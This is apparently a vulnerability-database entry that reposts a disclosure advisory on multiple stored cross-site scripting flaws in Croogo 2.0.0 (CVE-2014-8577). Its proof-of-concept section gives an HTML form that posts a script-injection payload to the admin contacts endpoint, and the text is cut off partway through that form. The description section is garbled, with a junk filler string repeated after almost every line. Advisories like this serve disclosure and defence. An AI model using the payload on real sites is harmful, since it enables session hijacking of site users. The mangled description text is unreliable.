Croogo 2.0.0 Multiple Stored XSS Vulnerabilities

40   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1319
CVE编号: CVE-2014-8577
漏洞类型: -
漏洞来源: cxs
发布日期: 2014-10-13
CVSS
CVSS值: 4.3/10
严重级别: 低危
利用范围: Remote
攻击复杂度: Medium
认证级别: No required
漏洞描述

WLB-2014100076[***]http://cxsecurity.com/issue/WLB-2014100076[***]Bug: Croogo 2.0.0 Multiple Stored XSS Vulnerabilities ( Ascii Version )[***]Croogo 2.0.0 Multiple Stored XSS Vulnerabilities[***]2014-10-13 / 2014-11-02[***]Gjoko 'LiquidWorm' Krstic[***]Low[***]CWE-79@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]CVE-2014-8577@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********[***]No[***]Yes[***]4.3/10[***]2.9/10[***]8.6/10[***]Remote[***]No required[***]None[***]Partial[***]None[***] <<<@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Croogo 2.0.0 Multiple Stored XSS Vulnerabilities@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vendor: Fahad Ibnay Heylaal@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Product web page: http://www.croogo.org@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Affected version: 2.0.0@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Summary: Croogo is a free, open source, content management system@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** for PHP, released under The MIT License. It is powered by CakePHP@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** MVC framework.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Desc: Croogo version 2.0.0 suffers from multiple stored cross-site@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** scripting vulnerabilities. Input passed to several POST parameters@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** is not properly sanitised before being returned to the user. This@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** can be exploited to execute arbitrary HTML and script code in a@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** user's browser session in context of an affected site.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Tested on: Apache/2.4.7 (Win32)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** PHP/5.5.6@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** MySQL 5.6.14@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vulnerability discovered by Gjoko 'LiquidWorm' Krstic@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Zero Science Lab - http://www.zeroscience.mk@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Macedonian Information Security Research And Development Laboratory@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Advisory ID: ZSL-2014-5201@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vendor: http://blog.croogo.org/blog/croogo-210-released@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 26.07.2014@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** >>>@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ------------------------@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** (XSS #1)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** --------@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** POST parameters:@@@@@@@@@@$$$

POC

<<< Croogo 2.0.0 Multiple Stored XSS Vulnerabilities Vendor: Fahad Ibnay Heylaal Product web page: http://www.croogo.org Affected version: 2.0.0 Summary: Croogo is a free, open source, content management system for PHP, released under The MIT License. It is powered by CakePHP MVC framework. Desc: Croogo version 2.0.0 suffers from multiple stored cross-site scripting vulnerabilities. Input passed to several POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache/2.4.7 (Win32) PHP/5.5.6 MySQL 5.6.14 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Zero Science Lab - http://www.zeroscience.mk Macedonian Information Security Research And Development Laboratory Advisory ID: ZSL-2014-5201 Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php Vendor: http://blog.croogo.org/blog/croogo-210-released 26.07.2014 >>> ------------------------ (XSS #1) -------- POST parameters: - data[Contact][title] ------------------------ <html> <!-- PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST"> <input type="hidden" name="_method" value="POST" /> <input type="hidden" name="data[_Token][key]" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e" /> <input type="hidden" name="data[Contact][id]" value="" /> <input type="hidden" name="data[Contact][title]" value=""><script>alert("XSS")&#59;<& #47;script>" /> <input type="hidden" name="data[Contact][alias]" value="test" /> <input type="hidden" name="data[Contact][email]" value="a@a.com" /> <input type="hidden" name="data[Contact][body]" value="" /> <input type="hidden" name="data[Contact][name]" value="" /> <input type="hidden" name="data[Contact][position]" value="" /> <input type="hidden" name="data[Contact][address]" value="" /> <input type="hidden" name="data[Contact][address2]" value="" /> <input type="hidden" name="data[Contact][state]" value="" /> <input type="hidden" name="data[Contact][country]" value="" /> <input type="hidden" name="data[Contact][postcode]" value="" /> <input type="hidden" name="data[Contact][phone]" value="" /> <input type="hidden" name="data[Contact][fax]" value="" /> <input type="hidden" name="data[Contact][message_status]" value="0" /> <input type="hidden" name="data[Contact][message_archive]" value="0" /> <input type="hidden" name="data[Contact][message_notify]" value="0" /> <input type="hidden" name="data[Contact][message_spam_protection]" value="0" /> <input type="hidden" name="data[Contact][message_captcha]" value="0" /> <input type="hidden" name="data[Contact][status]" value="0" /> <input type="hidden" name="data[_Token][fields]" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id" /> <input type="hidden" name="data[_Token][unlocked]" value="apply" /> <input type="